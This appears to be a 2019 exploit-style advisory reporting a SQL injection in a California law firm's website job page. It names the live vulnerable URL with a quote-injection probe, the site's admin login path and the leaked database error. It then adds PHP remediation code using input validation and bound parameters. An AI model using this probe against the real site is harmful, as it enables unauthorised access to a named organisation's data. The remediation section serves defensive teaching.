Fagen Friedman & Fulfrost LLP SQLi

2019.09.10
H.BBF3.4 (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Fagen Friedman & Fulfrost LLP SQLi
# Date: 10 Sep 2019
# Author: H.BBF3.4 & A.BBF3.4

+++++++++++++++++++++++++
ABOUT Fagen Friedman & Fulfrost:
Fagen Friedman & Fulfrost’s attorneys are leaders in their fields and diverse in experience, education and interests. Our firm offers comprehensive legal services to school districts, county offices of education, Special Education Local Plan Areas, and community colleges. Fagen Friedman & Fulfrost LLP "F3" represents nearly 400 of California's educational institutions and related agencies. These institutions include school districts, community college districts, SELPAs, county offices of education and public agencies.
++++++++++++++++++++++++++

# SQL Injection Exploit :
**********************
job.php?jid=

# Example Vulnerable Sites :
*************************
[+] https://www.f3law.com/job.php?jid=9%27

admin login: https://www.f3law.com/admin/

# Example SQL Database Error :
****************************
ERROR: Select Sidebars
MySQL said: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND s.active = 'Y' ORDER BY sort_order' at line 4
Query: SELECT * FROM sidebars s INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id WHERE sp.idjob_post = 9' AND s.active = 'Y' ORDER BY sort_order;
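The error above shows the jid value landing unquoted in the WHERE clause (sp.idjob_post = 9') and the full query being echoed to the client. The PHP below is an added example, not code from the advisory or the affected site: it runs the same sidebar query with jid validated as an integer and passed as a bound parameter, and answers bad input with a generic rejection instead of the SQL error text. The helper name sidebarsForJob, the title column, the sample rows, and the in-memory SQLite database standing in for MySQL are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed schema and rows; in-memory SQLite stands in for the site's MySQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE sidebars (sidebar_id INTEGER PRIMARY KEY, title TEXT, active TEXT, sort_order INTEGER)");
$pdo->exec("CREATE TABLE sidebars_jobs (sidebar_id INTEGER, idjob_post INTEGER)");
$pdo->exec("INSERT INTO sidebars VALUES (1, 'Benefits', 'Y', 2), (2, 'Offices', 'Y', 1), (3, 'Retired', 'N', 3)");
$pdo->exec("INSERT INTO sidebars_jobs VALUES (1, 9), (2, 9), (3, 9), (1, 10)");

/**
 * Hypothetical helper: returns the active sidebars for one job post.
 * $rawJid is the untrusted ?jid= value exactly as received.
 */
function sidebarsForJob(PDO $pdo, string $rawJid): array
{
    // 1. Allow-list validation: jid must be a positive decimal integer.
    $jid = filter_var($rawJid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($jid === false) {
        throw new InvalidArgumentException('jid must be a positive integer');
    }

    // 2. Bound parameter: the value is never concatenated into the SQL text.
    $stmt = $pdo->prepare(
        "SELECT s.sidebar_id, s.title
           FROM sidebars s
           INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id
          WHERE sp.idjob_post = :jid AND s.active = 'Y'
          ORDER BY s.sort_order"
    );
    $stmt->bindValue(':jid', $jid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a valid id, the quoted value from the report, and a non-number.
foreach (['9', "9'", 'abc'] as $input) {
    try {
        $titles = array_column(sidebarsForJob($pdo, $input), 'title');
        echo json_encode($input), ' -> ', implode(', ', $titles), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        // 3. Generic rejection: no query text or driver message reaches the client.
        echo json_encode($input), ' -> rejected (respond with HTTP 400)', PHP_EOL;
    }
}
```

Driver exceptions other than the validation error should be logged server-side and answered with a generic error page, so the query text is not disclosed as it is in the report.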


Copyright 2019, cxsecurity.com

 
